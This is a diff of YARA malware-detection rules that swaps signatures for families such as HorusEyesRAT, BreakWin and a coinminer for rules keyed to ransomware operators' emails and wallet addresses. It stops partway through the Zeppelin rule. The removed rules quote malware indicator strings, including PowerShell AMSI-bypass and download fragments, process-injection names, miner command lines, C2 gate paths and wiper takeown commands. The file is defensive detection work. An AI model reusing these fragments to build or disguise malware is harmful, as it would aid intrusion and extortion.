+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Unlockyourfiles
 {
 	meta:
-		description = "Detects Gasket"
-		author = "ditekSHen"
-		id = "3afa131d-9c88-50df-a3b4-552db4a84e69"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with UnlockYourFiles ransomware"
+		author = "ditekShen"
+		id = "fdc3ec49-66cc-5a0b-87a6-3660dd6f3b72"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7220-L7250"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L279-L288"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0279979915891fc8c813ba555120ee5705b53b234a808b5ca77bff35a082e376"
+		logic_hash = "a33dae7f08eb0c2415fbfdadf2cbbf90c68bc802352277422c6d0a2dbd62cd82"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "main.checkGasket" ascii
-		$s2 = "main.connectGasket" ascii
-		$s3 = "/cert/trust/dev/stderr/dev/stdout/index.html" ascii
-		$f1 = ".SetPingHandler." ascii
-		$f2 = ".SetPongHandler." ascii
-		$f3 = ".computeMergeInfo." ascii
-		$f4 = ".computeDiscardInfo." ascii
-		$f5 = ".readPlatformMachineID." ascii
-		$f6 = ".(*Session).establishStream." ascii
-		$f7 = ".(*Session).handleGoAway." ascii
-		$f8 = ".(*Stream).processFlags." ascii
-		$f9 = ".(*Session).handlePing." ascii
-		$f10 = ".(*windowsService).Install." ascii
-		$f11 = ".(*windowsService).Uninstall." ascii
-		$f12 = ".(*windowsService).Status." ascii
-		$f13 = ".getStopTimeout." ascii
-		$f14 = ".DialContext." ascii
-		$f15 = ".WriteControl." ascii
-		$f16 = ".(*Server).authenticate." ascii
-		$f17 = ".(*Server).ServeConn." ascii
-		$f18 = ".(*TCPProxy).listen." ascii
-		$f19 = ".UserPassAuthenticator.Authenticate." ascii
-		$f20 = ".(*InfoPacket).XXX_" ascii
+		$s1 = "4lok3r@tutanota.com" ascii wide nocase
+		$s2 = "4lok3r@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 16 of ( $f* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Silentmoon : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Darkside
 {
 	meta:
-		description = "Detects SilentMoon"
-		author = "ditekSHen"
-		id = "0b41a07b-0e2a-5bbf-8789-3b46460d2c09"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with DarkSide ransomware"
+		author = "ditekShen"
+		id = "7b29b9b9-4657-551e-b770-880a2278ef60"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7252-L7272"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L290-L299"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1aa61e83d0003ef41d16fd40698485fdf41a957639ac3c3f2770994a43bd502a"
+		logic_hash = "3c6cdb15cad19f1db38c0fe03ecb24d5cd4861a699aa2bee0f99b8dddacc8bd1"
 		score = 75
-		quality = 25
-		tags = "FILE"
+		quality = 73
+		tags = ""
+		hash1 = "bafa2efff234303166d663f967037dae43701e7d63d914efc8c894b3e5be9408"
 
 	strings:
-		$s1 = "\\\\.\\Global\\PIPE\\" fullword wide
-		$s2 = "REMOTE_NS:ERROR:%d" fullword ascii
-		$s3 = "REMOTE:ERROR:%d" fullword ascii
-		$s4 = "COMNAP,COMNODE,SQLQUERY,SPOOLSS,LLSRPC,browser" fullword wide
-		$s5 = "Mem alloc err" fullword ascii
-		$s6 = "block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d" ascii
-		$x1 = "ACTION:UNSUPPORTED" fullword ascii
-		$x2 = "?ServiceMain@@YAXKPAPA_W@Z" fullword ascii
-		$x3 = "?ServiceCtrlHandler@@YGKKKPAX0@Z" fullword ascii
-		$x4 = "%d socks, %d sorted, %d scanned" ascii
-		$x5 = "GoldenSky" fullword wide
-		$x6 = "SilentMoon" fullword wide
-		$x7 = "internalstoragerpc" fullword wide
+		$s1 = "breathcojunktab1987@yahoo.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 3 of ( $x* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Lu0Bot : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Spyro
 {
 	meta:
-		description = "Detects Lu0Bot"
-		author = "ditekSHen"
-		id = "f8595553-b911-5e30-9ece-cad7d5913f19"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Spyro ransomware"
+		author = "ditekShen"
+		id = "9a42a9fd-dfaf-5719-acae-e7c3b92ecdc9"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7274-L7285"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L301-L310"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4822248230a804b1dc75f8d517af28a621dab1746c9ef45eaa4754149ce0cba"
+		logic_hash = "b12b24b7b1b9800d249fd322532d957ddfc020c495ca89414d8d7e9fa7d58eb7"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "WinExec" fullword ascii
-		$s2 = "AlignRects" fullword ascii
-		$o1 = { be 00 20 40 00 89 f7 89 f0 81 c7 a? 01 00 00 81 }
-		$o2 = { 53 50 e8 b0 01 00 00 e9 99 01 00 00 e8 ae 01 00 }
+		$s1 = "blackspyro@tutanota.com" ascii wide nocase
+		$s2 = "blackspyro@mailfence.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4KB and 1 of ( $s* ) and all of ( $o* )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Shellcodedlei : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryzerlo
 {
 	meta:
-		description = "Detects shellcode downloader, executer, injector"
-		author = "ditekSHen"
-		id = "62a4f141-87f8-596a-adf6-5bf9a50c9e91"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Ryzerlo / HiddenTear / RSJON ransomware"
+		author = "ditekShen"
+		id = "1e8b79dc-4a81-5126-a7a3-ad7a2e8f62bf"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7287-L7304"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L312-L320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "064c17427ae6b33ffb09a14abcb924d20ead44250e8bd03070bf40869f1c812e"
+		logic_hash = "2d925cac74411c3e408d674e27a27ae029d39977026a79df8f90edae345a31db"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "PPidSpoof" fullword ascii
-		$s2 = "ProcHollowing" fullword ascii
-		$s3 = "CreateProcess" fullword ascii
-		$s4 = "DynamicCodeInject" fullword ascii
-		$s5 = "PPIDDynCodeInject" fullword ascii
-		$s6 = "MapAndStart" fullword ascii
-		$s7 = "PPIDAPCInject" fullword ascii
-		$s8 = "PPIDDLLInject" fullword ascii
-		$s9 = "CopyShellcode" fullword ascii
-		$s10 = "GetEntryFromBuffer" fullword ascii
+		$s1 = "darkjon@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 5 of ( $s* )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Bluebot : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_PYSA
 {
 	meta:
-		description = "Detects BlueBot"
-		author = "ditekSHen"
-		id = "cddd40bb-c3c6-5c44-9cb1-480571375be8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with PYSA / Mespinoza ransomware"
+		author = "ditekShen"
+		id = "b26d472b-c94e-576d-b168-6f273bb8fca5"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7306-L7333"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L322-L340"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "04a19f649eb2fff7a5bc59ccead80cd0a04c4e5418cbc83e850045dba75b03e0"
+		logic_hash = "cf0fbc0160f1d21efdb4a6935ae0d2206107042e3d020722f50d2c302aff246c"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 55
+		tags = ""
 
 	strings:
-		$x1 = "Blue_Botnet" wide
-		$x2 = "5-START-http" ascii
-		$x3 = "*300-END-" ascii
-		$x4 = "botlogger.php" wide
-		$s1 = "//TARGET//" wide
-		$s2 = "//BLOG//" wide
-		$s3 = "MCBOTALPHA" wide
-		$s4 = "//IPLIST//" wide
-		$s5 = "Host: //BLOG//" wide
-		$s6 = "User-Agent: //USERAGENT//" wide
-		$s7 = "<string>//TARGET//</string>" wide
-		$s8 = "POST //URL// HTTP/1.1/r/n" wide
-		$v1 = "<attack>b__" ascii
-		$v2 = "PressData" fullword ascii
-		$v3 = "POSTPiece" fullword ascii
-		$v4 = /(load|tcp|udp)Stuff/ fullword ascii
-		$v5 = "isAttacking" fullword ascii
-		$v6 = "DoSAttack" fullword ascii
-		$v7 = "prv_attack" fullword ascii
-		$v8 = "blogList" fullword ascii
+		$s1 = "luebegg8024@onionmail.org" ascii wide nocase
+		$s2 = "mayakinggw3732@onionmail.org" ascii wide nocase
+		$s3 = "lauriabornhat7722@protonmail.com" ascii wide nocase
+		$s4 = "DeborahTrask@onionmail.org" ascii wide nocase
+		$s5 = "AlisonRobles@onionmail.org" ascii wide nocase
+		$s6 = "NatanSchultz67@protonmail.com" ascii wide nocase
+		$s7 = "jonikemppi@onionmail.org" ascii wide nocase
+		$s8 = "lanerosalie49003@onionmail.org" ascii wide nocase
+		$s9 = "bernalmargaret645@onionmail.org" ascii wide nocase
+		$s10 = "carlhubbard2021@protonmail.com" ascii wide nocase
+		$u1 = "http://pysa2bitc" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or 5 of ( $v* ) or 9 of them )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Unkcobaltstrike : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ranzylocker
 {
 	meta:
-		description = "Detects unknown malware, potentially CobaltStrike related"
-		author = "ditekSHen"
-		id = "24ddccc7-3700-57a1-999c-ddefae6911bb"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with RanzyLocker ransomware"
+		author = "ditekShen"
+		id = "33478dc4-c0ec-5cc8-8620-79e770f6a773"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7335-L7354"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L354-L363"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2fb4e87eec3b56773b812ce6a5c28143183087e0f93d92d76c1103563f8e0891"
+		logic_hash = "dc345257a3cca82a95e20505c94e90d8ac42240e1491ea1f34be121871673e26"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "https://%hu.%hu.%hu.%hu:%u" ascii wide
-		$s2 = "https://microsoft.com/telemetry/update.exe" ascii wide
-		$s3 = "\\System32\\rundll32.exe" ascii wide
-		$s4 = "api.opennicproject.org" ascii wide
-		$s5 = "%s %s,%s %u" ascii wide
-		$s6 = "User32.d?" ascii wide
-		$s7 = "StrDupA" fullword ascii wide
-		$s8 = "{6d4feed8-18fd-43eb-b5c4-696ad06fac1e}" ascii wide
-		$s9 = "{ac41592a-3d21-46b7-8f21-24de30531656}" ascii wide
-		$s10 = "bd526:3b.4e32.57c8.9g32.35ef41642767~" ascii wide
-		$s11 = { 4b d3 91 49 a1 80 91 42 83 b6 33 28 36 6b 90 97 }
-		$s12 = { 0d 4c e3 5c c9 0d 1f 4c 89 7c da a1 b7 8c ee 7c }
+		$s1 = "eviluser@tutanota.com" ascii wide nocase
+		$s2 = "evilpr0ton@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_EXEPWSHDL : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alkhal
 {
 	meta:
-		description = "Detects executable downloaders using PowerShell"
-		author = "ditekSHen"
-		id = "1e5a414b-e81e-5915-b00b-75edbfcc32d2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with AlKhal ransomware"
+		author = "ditekShen"
+		id = "32e14a6e-fc2e-5c0a-b8e3-33e219923d90"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7356-L7374"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L365-L374"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "58fbd27758ecd435eb30b7c34f4cf142db8e31edee0838175992923a51706508"
+		logic_hash = "bd2d66a9cd33ab15b451158cd6c0e6579735653611ee2e6c8045a5807091938d"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$x1 = "[Ref].Assembly.GetType(" ascii wide
-		$x2 = ".SetValue($null,$true)" ascii wide
-		$s1 = "replace" ascii wide
-		$s2 = "=@(" ascii wide
-		$s3 = "[System.Text.Encoding]::" ascii wide
-		$s4 = ".substring" ascii wide
-		$s5 = "FromBase64String" ascii wide
-		$d1 = "New-Object" ascii wide
-		$d2 = "Microsoft.XMLHTTP" ascii wide
-		$d3 = ".open(" ascii wide
-		$d4 = ".send(" ascii wide
+		$s1 = "alkhal@tutanota.com" ascii wide nocase
+		$s2 = "cyrilga@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of ( $x* ) and ( 3 of ( $s* ) or all of ( $d* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_MB150 : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_DECAF
 {
 	meta:
-		description = "Detects MB150? Go ransomware"
-		author = "ditekSHen"
-		id = "9688974b-ccf9-59ea-bb31-e46c63f021bf"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with DECAF ransomware"
+		author = "ditekShen"
+		id = "24422015-56f3-503e-a902-0183eb601b22"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7376-L7402"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L376-L408"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a07535fc53912ddde6a0bed187c21ecdb2701d317d7de0cbdd2db37071bc9a21"
+		logic_hash = "8fca3a6564cd11e625b65e7f0f278b79678368dd0c77440e9f8d46035e0c3426"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$x1 = /main\.evade_(clicks_count|cpu_count|disk_size|foreground_window|hostname|mac|printer|screen_size|system_memory|time_acceleration|tmp|utc)/ fullword ascii
-		$x2 = /main\.sandbox_(hostname|mac_addresses)/ fullword ascii
-		$x3 = "main.drop_ransom_note" fullword ascii
-		$x4 = "main.ransom_amount" fullword ascii
-		$x5 = "main.create_encryption_key" fullword ascii
-		$x6 = "main.encrypt" fullword ascii
-		$x7 = "main.encrypt_encryption_key" fullword ascii
-		$x8 = "main.encrypt_file" fullword ascii
-		$x9 = "main.ext_blacklist" fullword ascii
-		$mac1 = "00:03:FF00:05:6900:0C:2900:16:3E00:1C:1400:1C:4200:50:56" ascii nocase
-		$mac2 = "00-03-FF00-05-6900-0C-2900-16-3E00-1C-1400-1C-4200-50-56" ascii nocase
-		$mac3 = "0003FF000569000C2900163E001C14001C42005056" ascii nocase
-		$go = "Go build ID:" ascii
-		$s1 = "main.MB150" ascii
-		$s2 = "http://1.1.1.1" ascii
-		$s3 = "your personnal ID" ascii
-		$s4 = "ransom amount" ascii
-		$s5 = "binance.com" ascii
-		$s6 = "getmonero.org" ascii
+		$s1 = "22eb687475f2c5ca30b@protonmail.com" ascii wide nocase
+		$s2 = { 4d 49 49 42 43 67 4b 43 41 51 45 41 71 34 6b 31
+                48 64 62 31 54 48 72 7a 42 42 65 4f 31 38 34 6b
+                6e 43 62 42 4b 72 30 33 61 70 66 58 71 6c 4f 6b
+                53 64 74 48 53 4a 67 66 79 49 71 4a 50 47 78 6c
+                0a 2f 63 46 69 73 4a 6d 56 58 52 33 2f 74 34 65
+                39 46 62 4c 73 45 49 75 54 70 39 50 4a 54 63 69
+                6f 6d 48 66 72 35 43 67 43 51 7a 68 6e 41 5a 30
+                41 76 6a 47 42 61 57 50 36 4b 70 43 79 66 44 6e
+                73 0a 79 62 72 75 79 4b 71 79 67 61 57 70 5a 53
+                41 6e 7a 52 64 42 2b 54 41 6b 75 35 69 71 79 38
+                71 31 56 77 6e 4e 35 37 51 42 6c 74 72 6f 30 59
+                4a 5a 38 65 6e 4b 5a 52 54 6c 63 7a 6d 74 6a 65
+                4f 70 0a 42 2f 78 75 54 4f 75 44 6a 6d 55 53 4e
+                69 47 79 69 6a 57 42 56 66 59 6b 37 73 56 58 6c
+                2f 6c 51 38 74 61 58 72 33 36 78 50 57 68 4d 49
+                47 30 45 71 52 56 72 46 56 2b 63 61 76 53 37 5a
+                34 76 61 0a 79 58 6d 63 66 35 35 4e 6b 70 4d 47
+                4b 4b 59 38 75 71 76 77 62 34 61 4c 49 4b 61 62
+                65 6b 32 6e 55 57 42 67 4e 67 53 4f 74 71 42 4c
+                4c 4c 32 41 32 62 59 2f 35 73 30 47 4a 2f 56 56
+                2b 45 6d 49 0a 58 37 2f 7a 49 2b 46 63 65 55 2b
+                64 63 4e 58 2f 69 72 30 75 6a 50 34 79 73 34 6d
+                2f 6a 6a 5a 44 34 77 49 44 41 51 41 42 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or ( $go and 4 of ( $s* ) ) or ( 1 of ( $mac* ) and ( 2 of ( $x* ) or 3 of ( $s* ) ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Horuseyesrat : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Babuk
 {
 	meta:
-		description = "Detects HorusEyesRAT"
-		author = "ditekSHen"
-		id = "80b2fd11-f8b4-5aee-b55a-4f7ee9fad6cf"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Babuk ransomware"
+		author = "ditekShen"
+		id = "139cea69-9661-5cb7-bf74-a14e3556c759"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7435-L7451"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L410-L426"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c0f499e3a17923b391ed6b7fa723525a9d4aef0ce04a2c7abec60d5eda15888f"
+		logic_hash = "129b1364bb59423aab1f5f67a4c2d2a76a9c4f55aa6aa1e59bcebc717a14ee19"
 		score = 75
-		quality = 48
-		tags = "FILE"
+		quality = 61
+		tags = ""
 
 	strings:
-		$x1 = "\\HorusEyesRat-" ascii
-		$x2 = "\\HorusEyesRat.pdb" ascii
-		$x3 = "get_horus_eye" ascii
-		$s1 = "get_Type_Packet" fullword ascii
-		$s2 = "PacketLib" fullword ascii nocase
-		$s3 = "System.Net.Sockets" fullword ascii
-		$s4 = "PROCESS_MODE_BACKGROUND_BEGIN" fullword ascii
-		$s5 = "EXECUTION_STATE" fullword ascii
-		$s6 = /Plugins\\[A-Z]{2}.dll/ fullword wide
+		$s1 = "mitnickd@ctemplar.com" ascii wide nocase
+		$s2 = "zar8b@tuta.io" ascii wide nocase
+		$s3 = "recover300dollars@gmail.com" ascii wide nocase
+		$s4 = "support.3330@gmail.com" ascii wide nocase
+		$s5 = "decryptdelta@gmail.com" ascii wide nocase
+		$s6 = "pyotrmaksim@gmail.com" ascii wide nocase
+		$s7 = "retrievedata300@gmail.com" ascii wide nocase
+		$s8 = "3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs" ascii wide
+		$s9 = "46zdZVRjm9XJhdjpipwtYDY51NKbD74bfEffxmbqPjwH6efTYrtvbU5Et4AKCre9MeiqtiR51Lvg2X8dXv1tP7nxLaEHKKQ" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) and #s6 > 4 ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Breakwin : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rapid
 {
 	meta:
-		description = "Detects BreakWin Wiper"
-		author = "ditekSHen"
-		id = "4ffadbfa-c1cc-59e6-a9ba-7a34eca6c3fe"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Rapid ransomware"
+		author = "ditekShen"
+		id = "a1c6f3c0-2fec-5d96-9965-8129a843ae90"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7453-L7471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L428-L436"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "86fc89e28fc107c2d4fe98dc16048d9e076b1fef53a3df0814f80a88bbe09c48"
+		logic_hash = "ea82a3fcb1d836e1c250e9a576064e1babdb82b4970555260af2eb68726cfd16"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "Started wiping file %s with %s." fullword wide
-		$s2 = "C:\\Program Files\\Lock My PC" wide
-		$s3 = "Stardust is still alive." fullword wide
-		$s4 = "Failed to terminate the locker process." fullword wide
-		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s6 = "Process created successfully. Executed command: %s." fullword wide
-		$s7 = "locker_background_image_path" fullword ascii
-		$s8 = "takeown.exe /F \"C:\\Windows\\Web\\Screen\" /R /A /D Y" fullword ascii
-		$s9 = "icacls.exe \"C:\\Windows\\Web\\Screen\" /reset /T" fullword ascii
-		$s10 = "takeown.exe /F \"C:\\ProgramData\\Microsoft\\Windows\\SystemData\" /R /A /D Y" fullword ascii
-		$s11 = ".?AVProcessSnapshotCreationFailedException@@" fullword ascii
+		$s1 = "jimmyneytron@tuta.io" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer03 : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Satana
 {
 	meta:
-		description = "Detects coinmining malware"
-		author = "ditekSHen"
-		id = "e0e57557-7c46-5336-b904-c4c1f142bd81"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Satana ransomware"
+		author = "ditekShen"
+		id = "a362d4ca-d475-5392-a3ac-45337425d8e7"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7506-L7528"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L438-L447"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f22e1af955a0d132dda820fe5e5e1ae2f077b7264ce1f0125a2f37c0da6b6508"
+		logic_hash = "6d82e2497044518cee1b56da85f1ad6ac7934eec9ca68501932d55add4236d45"
 		score = 75
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$s1 = "UnVzc2lhbiBTdGFuZGFyZCBUaW1l" wide
-		$s2 = "/xmrig" wide
-		$s3 = "/gminer" wide
-		$s4 = "-o {0} -u {1} -p {2} -k --cpu-priority 0 --threads={3}" wide
-		$s5 = "--algo ethash --server" wide
-		$s6 = "--algo kawpow --server" wide
-		$cnc1 = "/delonl.php?hwid=" fullword wide
-		$cnc2 = "/gateonl.php?hwid=" fullword wide
-		$cnc3 = "&cpuname=" fullword wide
-		$cnc4 = "&gpuname=" fullword wide
-		$cnc5 = "{0}/gate.php?hwid={1}&os={2}&cpu={3}&gpu={4}&dateinstall={5}&gpumem={6}" fullword wide
-		$cnc6 = "/del.php?hwid=" fullword wide
-		$f1 = "<StartGpuethGminer>b__" ascii
-		$f2 = "<StartGpuetcGminer>b__" ascii
-		$f3 = "<StartGpurvnGminer>b__" ascii
+		quality = 73
+		tags = ""
+
+	strings:
+		$s1 = "adamadam@ausi.com" ascii wide nocase
+		$s2 = "XsrR2he2Z8un5ysGWnJ1wveZRPRS96XEoX" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $cnc* ) or ( 2 of ( $f* ) and ( 1 of ( $s* ) or 1 of ( $f* ) ) ) or all of ( $f* ) or 5 of ( $s* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Zeppelin : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeppelin
 {
 	meta:
-		description = "Detects Zeppelin (Delphi) ransomware"
-		author = "ditekSHen"
-		id = "368d0c31-745d-50ad-a265-50561fdc822a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Zeppelin ransomware"
+		author = "ditekShen"
+		id = "f3bbfcd0-c66c-589e-ae04-904314d6a869"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7530-L7545"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L449-L462"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6c8420756b562662985dd26eaad58500a24cae786a47b788c953e86276116a1"
+		logic_hash = "66dd92423cfac32de4bea95ad0c9594cb449dc897cc6315d782c1db6de7dc5b1"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 63
+		tags = ""
 
 	strings:
-		$s1 = "TUnlockAndEncrypt" ascii
-		$s2 = "TExcludeFiles" ascii
-		$s3 = "TExcludeFolders" ascii
-		$s4 = "TDrivesAndShares" ascii
-		$s5 = "TTaskKiller" ascii
-		$x1 = "!!! D !!!" ascii
-		$x2 = "!!! LOCALPUBKEY !!!" ascii
-		$x3 = "!!! ENCLOCALPRIVKEY !!!" ascii
